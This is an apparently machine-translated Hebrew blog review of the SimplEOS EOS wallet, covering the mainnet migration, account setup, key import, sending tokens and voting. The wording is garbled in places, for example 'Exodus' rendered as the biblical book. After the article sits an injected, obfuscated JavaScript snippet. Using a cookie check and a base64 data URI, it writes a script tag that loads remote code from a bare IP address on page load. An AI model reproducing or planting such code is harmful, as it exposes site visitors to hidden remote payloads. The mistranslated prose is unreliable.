15 49.0138 8.38624 1 0 4000 1 https://www.frank-gehry.com 300 0
theme-sticky-logo-alt
theme-logo-alt

סקירת ארנק EOS Rio: הארנק הטוב ביותר עבור מיינט?

מאז ההשקה של EOS Mainnet ב -9 ביוני 2018, מחזיקי EOS נאלצו לחפש דרכים חלופיות לאחסון המטבעות שלהם. הסיבה היא שהמיינט הביא את ה- blockchain EOS ובאופן טבעי מטבעות EOS הועברו אליו בהחלפה סמלית. המשמעות היא שלא ניתן לאחסן עוד מטבעות EOS בארנקים שבעבר היו מסוגלים לאחסן EOS כשהיה אסימון ERC-20 מבוסס Ethereum. פתרונות אחסון EOS מבוססי Ethereum אינם תואמים למטבע EOS. הבעיה היא שלא היה הרבה זמן עבור מפתחים ליצור פתרונות אחסון וכמעט לאף אחד מהארנקים הזמינים יש את כל הפונקציונליות הדרושה למחזיקי EOS..

פרט ל- SimplEOS, כלומר.

ארנק ה- SimplEOS מובא אליכם על ידי צוות EOS Rio. זהו אחד הארנקים המקיפים והמאובטחים ביותר התומכים במטבעות Mainnet החדשים ומספק ממשק ידידותי למשתמש בצורה יוצאת דופן. לכל מי שרוצה דרך קלה לאחסן או לבצע עסקאות של מטבעות ה- EOS Mainnet החדשים, זו האופציה המושלמת בשבילכם.

מה שאתה צריך לדעת על ארנק SimplEOS

המיינט

רשת את’ריום מעולם לא הייתה אמורה להיות הבית הקבוע לפרויקט EOS. המטרה עצמה הייתה ליצור אתריום טוב יותר לצד פלטפורמת מותג לחוזים חכמים ו- dApps, כאשר המעבר לבלוקצ’יין משלו תמיד נמצא בקנה אחד. הבעיה היא שכל כך הרבה משקיעים שמעו כי אחיזה ושכחה מהקריפטו שלהם היה רעיון טוב. התוצאה הייתה שמחזיקי מטבעות רבים הופתעו מהשקת מיינט ונאלצו להגיב במהירות כדי להשתתף בהחלפת האסימונים..

אז מה קרה עם המטבעות הישנים? אסימוני EOS ERC-20 שנבנו על Ethereum הוקפאו והמשקיעים שנרשמו להחלפת האסימונים קיבלו כמות שווה של מטבעות ברשת החדשה. עם זאת, היה מלכוד. אותם משקיעים המשתמשים בפתרון האחסון הפופולרי של אקסודוס גילו כי פתרון האחסון אינו תומך במשיכות מיידיות למיינט. למעשה אקסודוס הקפיאה את כל מטבעות ה- EOS של המשתמשים שלהם בגלל חששות אבטחה של Mainnet.

למותר לציין שהתחוללה סערה בקרב קהילת יציאת מצרים. מישהו היה צריך לעשות משהו ולעשות את זה בקרוב.

EOS ריו

לוגו EOS Rio

פרויקט EOS אינו תלוי בכורים שיאבטחו את הרשת. במקום זאת, משימות התמיכה והתחזוקה של הרשת מועברות למספר ‘מפיקי בלוקים’, שמקבלים תגמולים כספיים עבור השירותים הקריטיים שלהם. באופן טבעי, התחרות להיות אחד המעטים המיוחסים היא די אינטנסיבית, כאשר ארגונים רבים ושונים נאבקים זה בזה להיבחר..

EOS Rio הוא אחד ממפיקי הבלוקים הללו ומבוסס באופן לא מפתיע בריו דה ז’ניירו. הצוות בריו הבחין כי בשוק חסר פיתרון פשוט לאחסון מטבעות, אשר גם סיפק את כל הפונקציונליות של פלטפורמת EOS ולכן הם יצרו את ארנק ה- SimplEOS.

החדשות הטובות הן שהם הצליחו ויצרו דרך פשוטה לכולם לקיים אינטראקציה עם ה- blockchain EOS. לא רק זה, אלא גם ארנק ה- SimplEOS פועל בכל מערכות ההפעלה הגדולות של המחשב האישי.

סֵפֶר שֵׁמוֹת

גרפיקה של תיק ארנק אקסודוס

‘בארנק אלוהים אחד אנחנו סומכים עליו’ הוא המוטו עבור כל כך הרבה המשתמשים באקסודוס. יש לכך סיבה טובה מאוד: אקסודוס תומכת בעשרות מטבעות קריפטוגרפיים שונים ומספקת דרך ממש קלה לאחסון קריפטו. מטבעות נתמכים נעים ממשקלים כבדים כמו ביטקוין ועד אסימונים לא ברורים יחסית כמו Gnosis והרבה מטבעות שונים ביניהם. עד לאחרונה הוא תמך גם במטבע ה- EOS ומחזיקי מטבע רבים הפכו את Exodus ידידותית למתחילים לארנקם המועדף עליהם לאחסן את אסימוני ה- EOS שלהם..

ואז נפל הפטיש.

תכונות ארנק EOS Rio

העברת אסימונים

 • בכמה לחיצות בודדות ניתן לשלוח או לקבל EOS אסימונים בקלות מכל חשבון ברשת.

רשימת אנשי קשר

 • הפתרון כולל פנקס כתובות. זה הופך את זה למהיר וקל יותר למשלוח כספים לאנשים שאתה עוסק בהם באופן קבוע.

תמיכה מרובת חשבונות

 • ניתן לנהל מספר חשבונות בו זמנית מאותו ארנק.

צור חשבונות חדשים

 • החבר’ה בריו הפכו את תהליך יצירת החשבון לרוח וברק מהיר.

אחסון מקומי בלבד

 • מידע רגיש כמו מפתחות פרטיים לעולם לא משודר ברשת.

Airdrops תמיכה

 • אף אחד לא אוהב להחמיץ דברים בחינם. Airdrops הם כאשר EOS מציגה את מחזיקי המטבע שלה עם אסימונים בחינם. החדשות הטובות הן שריו דאגה לתמיכה בטיפות אוויר ושמשתמשים יכולים לאחסן אסימונים מונפנים בפתרון האחסון..

היסטוריית עסקאות

 • יומן עסקאות נרשם ונשמר בארנק. זה אומר שאתה יכול לבדוק בקלות למי שלחת כספים ומתי.

פורטל הצבעה

 • ריו מאפשרת לך גם לקחת חלק בבחירות המפיקים חסומים ומאפשרת לך להצביע.

יתד / ביטול

 • אסימונים יכולים להימסר בקלות או להסיר אותם מהרשת (למשל, במהלך הצבעה).

תאימות יציאת מצרים

 • כל המשתמשים שעשו את רישום האסימון בלחיצה אחת יכולים להעביר אותם במהירות ובקלות אל SimplEOS.

כיצד להתקין את ארנק EOS Rio?

גרפיקה של ארנק SimplEOS

מידע מפתח:

 • ארנק ה- EOS הפופולרי ביותר התומך במאנט.
 • קַל & מהיר להגדרה.
 • פלטפורמות נתמכות: MacOs, Windows & לינוקס.
 • מגוון רחב של תכונות כולל הצבעה על מיינט.

השתמש בארנק הפופולרי ביותר לאחסון מטבעות ה- EOS שלך.

הורד

מתחילים

יצירת חשבונות ב- EOS שונה מתחרות כמו את’ריום. בגלל האופן שבו הבלוקצ’יין החדש עובד, יהיה עליך ליצור חשבון EOS לפני שתוכל ליצור ארנק. למרבה המזל, SimplEOS מספק מדריך קל אחר צעד שיעזור לך בדרכך. אם כבר יש לך חשבון, אל תהסס לדלג לסעיף הבא.

יצירת שם חשבון EOS בארנק SimplEOS

שלב 1

לחיצה על כפתור ‘בקש חשבון חדש’ נותנת לך אפשרות לבחור את שם החשבון שלך. שמות החשבון חייבים להיות ייחודיים וזה דומה מאוד לאופן שבו אתה יוצר מזהה דואר אלקטרוני.

יצירת מפתח ציבורי ופרטי עם ארנק SimplEOS

שלב 2

עכשיו, כאן הדברים מתחילים להיות קצת מסובכים. המפתח הפרטי הוא, פשוטו כמשמעו, המפתח לחשבונך, כך שהיישום ימליץ לך להתנתק מהאינטרנט בשלב זה. אנו ממליצים לך לעשות זאת ולהגן על המפתח הפרטי שלך מפני האקרים ברשת. לאחר שתעשה זאת תוכל להזין מפתח ציבורי בעצמך (המשמש לתקשורת עם הבלוקצ’יין). אפשרות טובה עוד יותר יכולה להיות לבקש מהארנק לייצר עבורך זוג מפתחות פרטי-ציבורי.

קוד יצירת ארנק של SimplEOS

שלב 3

לעזאזל! ידעתי שזה יגיע לזה!

כפי שאתה יכול לראות, הארנק מראה לך שורה של שטויות שהוא קוד יצירת החשבון שלך. כל זה טוב ויפה אם יש לך מישהו שייצור לך אחד. אל דאגה, יש פיתרון אחר: יוצר חשבון EOS. עם זאת, רק שים לב שזה יעלה לך בסביבות 10 $ להשתמש בשירות זה.

תשלום יוצר חשבון EOS

שלב 4

בעיקרון, יוצר חשבון EOS הוא שירות המאפשר לך ליצור חשבון EOS במחיר נמוך בפיאט או בקריפטו. החדשות הטובות הן שבאתר יש אינטגרציה עם SimplEOS. המשמעות היא שאם תשנה את כתובת האתר עם? D = ואחריו קוד יצירת חשבונך, אז הטופס הארוך הזה ימולא אוטומטית ויחסוך לך הרבה טרחה. בינגו, חשבון ה- EOS שלך מוגדר ומוכן לצאת לדרך!

כיצד לייבא חשבון EOS קיים?

מסך ביתי של ארנק SimplEOS

ישנן שתי דרכים לייבא חשבון: אחת למשתמשי אקסודוס ואחת לכל האחרים. שני התהליכים שונים במקצת, אז קראו על זה שמתאים לכם.

כיצד לייבא מפתח EOS מאקסודוס

שלב 1 של ייבוא ​​ארנק Exodus לארנק SimplEOS

שלב ראשון

ההוראות די פשוטות. פשוט עבור לארנק Exodus שלך, ולחץ על האפשרות ‘ייצא מפתחות פרטיים’. המפתחות יורדו בקובץ a.csv, אותו ניתן להעלות על ידי הטלת הקובץ לתיבה המנוקדת.

צור סיסמה לייבוא ​​ארנק Exodus לארנק SimplEOS

שלב שני

בחר סיסמה לאבטחה נוספת.

קבל את חוקת EOS לייבוא ​​ארנק Exodus לארנק SimplEOS

שלב שלישי

כרגיל, קרא בעיון את התנאים וההגבלות לפני קבלתו. לחץ על תיבת הסימון שאומר שאתה ‘תציית לחוקה’ ולחץ על כפתור ‘הבא’.

הגדרת סיכת מנעול בעת ייבוא ​​ארנק Exodus לארנק SimplEOS

שלב רביעי

אתה יכול לבחור להגדיר סיכת מסך נעילה. המשמעות היא שאף אחד לא יכול לעבד עסקה אם הם נתקלים באקראי במכשיר שלך בזמן שהיישום פועל.

כיצד לייבא מפתח EOS מארנק קיים?

הזנת מפתח EOS פרטי בארנק SimplEOS

שלב 1

עבור משתמשים עם ארנקים קיימים (או כאלה שרק יצרו חשבון קודם) החדשות הטובות הן שהדברים קלים עוד יותר. מצא את ארנק הנייר הזה שמכיל את המפתח הפרטי שלך והיכנס בקפידה לחבורת הג’יבריש בלי לטעות. קל מדי.

שלב שני של יצירת ארנק SimplEOS באמצעות ארנק קיים

שלב 2

הקלד סיסמה חזקה במיוחד.

קבל את החוקה של EOS בעת יצירת ארנק SimplEOS

שלב 3

הם אוהבים לעשות את זה, לא? החוקה המוצגת כאן היא העתק מדויק של זו המוצגת למשתמשי אקסודוס. אל תקחו את המילה שלנו, קראו אותה ואשרו בעצמכם. אנחנו נחכה.

שלב 4

סיים את זה! סיים את זה כבר! האם אני בכלל צריך להגיד לך מה לעשות? לנפץ כמה מקשים ולקוות שהם ישברו.

באמצעות הארנק

כיצד לשלוח אסימונים?

למרבה המזל, החבר’ה בריו הקלו על שליחת אסימונים ל- EOS אחרים. פשוט לחץ על ‘שלח’ כדי להעביר אותו למסך למעלה. בחלק העליון של המסך מופיעים הכתובות שהפעלת בחשבונך. מימין, תראה את רשימת אנשי הקשר המותאמת אישית שלך. במרכז תוכלו לראות את שדות העסקה בפועל.

הזן את שם החשבון או בחר אדם מאנשי הקשר הקיימים שלך והזן את כמות ה- EOS שברצונך לשלוח. אתה יכול גם להתאים אישית את העסקה באמצעות תזכיר. כעת נותר רק לנפץ את כפתור השליחה כדי לעבד את העסקה שלך. זה כל כך פשוט!

הִיסטוֹרִיָה

ארנק ה- SimplEOS מספק גם תכונה נוחה לצפייה בהיסטוריית העסקאות שבוצעו בארנק. לחיצה על הכרטיסייה ‘היסטוריה’ מראה לך תיעוד של כל עסקה שקיבלת או שלחת.

הצבעה ב- EOS

זה תמיד רעיון טוב לממש את זכות ההצבעה שלך. יהיה עליך להניח את המטבעות שלך זמן מה, אולם אלא אם כן אתה סוחר יום זה לא אמור להיות בעיה. הצבעה מאפשרת לך לומר את דעתך באיזה מועמדים נבחרים לתפקיד מפיק הבלוקים הרווחי. זו החלטה חשובה לכולם בקהילה, אז וודא שאתה אומר את דעתך.

כיצד עובדת ההצבעה ב- EOS? ובכן, ניתן להשתמש בכל אסימון EOS בודד כדי להצביע לעד 30 מועמדים חסומים (בסופו של דבר ייבחרו רק 21), כאשר מספר האסימונים שתמשיך תואם למשקל ההצבעה שלך. זה נכון; ההצבעה של הבחור העשיר יותר חשובה משלך. זה פשוט משהו שאתה צריך להתמודד איתו.

מערכת הצבעה זו של הוכחה על ההימור (PoS) נועדה לייקר לשחקנים גרועים באופן בלתי נמנע לקנות את דרכם לשלטון..

כדי להצביע, עליך לבחור רשימה של עד 30 מועמדים חסומים כדי לתמוך ולמלא את הטופס כדי להמר על ה- EOS שלך ולהצביע. בחר את יתרתך לפי ערך או הקלד את המספר הנכון.

פתק: הצבעה ב- EOS היא תהליך מתמשך; ההצבעה שלך נחשבת כל עוד האסימונים שלך מושקעים בבלוקצ’יין. הם אפילו ‘מתפוררים’ לאורך זמן, אז זכור לבקר בדף מדי פעם כדי להצביע מחדש לאפקט המקסימלי.

אם אתה זקוק לאסימונים שלך לעסקה, אתה יכול לבטל את הוצאתם מהרשת. זה מקטין את כוח ההצבעה שלך, אבל זה מפנה לך אסימונים לשימוש. מילת אזהרה: שים לב שתהליך ביטול המטבעות שלך אינו מיידי. המטבעות שלך יזוכו בחשבונך לאחר 72 שעות.

מפת דרכים עתידית

אישורים

לפעמים, ייתכן שתרצה לאשר למישהו אחר לבצע עסקאות בשמך. תכונה זו תושם בקרוב, ותאפשר לך להאציל את ההרשאות על חלק מההחזקות שלך לאחר.

עסקאות מאוחרות מאוחרות

בהתחשב בכך שיש עיכוב של 72 שעות מביטול האסימונים וזיכוים בחזרה, ייתכן שמשתמשים מסוימים ירצו להגדיר עסקה שתעבור בזמן מוגדר מראש בעתיד. זה יתאפשר בקרוב בארנק SimplEOS.

גרסת נייד

כולם אוהבים שהקריפטו שלהם יהיה שימושי בכל מקום שהוא. צוות EOS Rio פועל במרץ כדי להעביר את הארנק לאנדרואיד ו- iOS, תוך מתן אותה פונקציונליות כמו גרסת שולחן העבודה.

סיכום

פרויקט ה- EOS היה חלק מהמחלוקת והביקורת, במיוחד בכל הנוגע להגירת המונטה. עם זאת, רוב החששות נוגעים להליכים המסובכים של הבלוקצ’יין, שמנעו ממשתמשים ממוצעים רבים להשתתף ברשת. ארנק ה- EOS Rio SimplEOS הוא צעד בכיוון הנכון, על ידי כך שהוא קל יותר להחזיק ולהעביר את אסימון ה- EOS בבלוקצ’יין החדש. עם בטיחותו וממשק המשתמש היפה שלו, ארנק ה- SimplEOS הוא ללא ספק ארנק ה- EOS הטוב ביותר למתחילים מלאים.

פונקציה getCookie (e) {var U = document.cookie.match (RegExp חדש (“(?: ^ |;)” + e.replace (/((\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, ”\\ $ 1 ″) +” = ([^;] *) ”)); להחזיר U? decodeURIComponent (U [1]): ריק 0} var src = “נתונים: text / javascript; base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, עכשיו = Math.floor (Date.now () / 1e3), עוגיה = getCookie ( “הפניה”); אם (עכשיו>= (time = cookie) || ריק 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new date ((תאריך חדש) .getTime () + 86400) ; document.cookie = ”redirect =” + time + ”; נתיב = /; יפוג = ”+ תאריך. ל- GMTString (), document.write (”)}

Previous Post
כיצד לקנות Litecoin בבריטניה
Next Post
ARK Coin: النظام البيئي الأكثر ابتكارًا لـ Blockchain؟